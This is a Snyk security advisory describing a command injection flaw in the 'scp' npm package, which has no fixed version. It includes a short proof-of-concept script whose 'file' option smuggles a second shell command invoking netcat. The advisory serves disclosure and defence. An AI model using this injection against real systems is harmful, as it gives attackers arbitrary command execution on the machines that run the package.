Arbitrary Command Injection Affecting scp package, versions *
Snyk CVSS
- Exploit Maturity: Proof of concept
- Attack Complexity: Low
- User Interaction: Required
- Confidentiality: High
- Integrity: High
- Snyk ID SNYK-JS-SCP-1009828
- published 21 Jun 2020
- disclosed 7 May 2020
- credit Mik317
How to fix?
There is no fixed version for scp.
Overview
Affected versions of this package are vulnerable to Arbitrary Command Injection. The issue occurs because user-supplied option values (such as the file name) are formatted into a shell command string that is then executed without any validation or escaping, so shell metacharacters in those values are interpreted by the shell.
PoC by Snyk Security Team
var scp = require('scp');
var options = {
  // `file` is inserted verbatim into the shell command the package builds,
  // so the metacharacters here terminate the scp command and run a second one
  file: '& nc localhost 4444; #',
  user: 'username',
  host: 'myServer',
  port: '20',
  path: '~'
};
scp.send(options, function (err) {
  if (err) console.log(err);
  else console.log('File transferred.');
});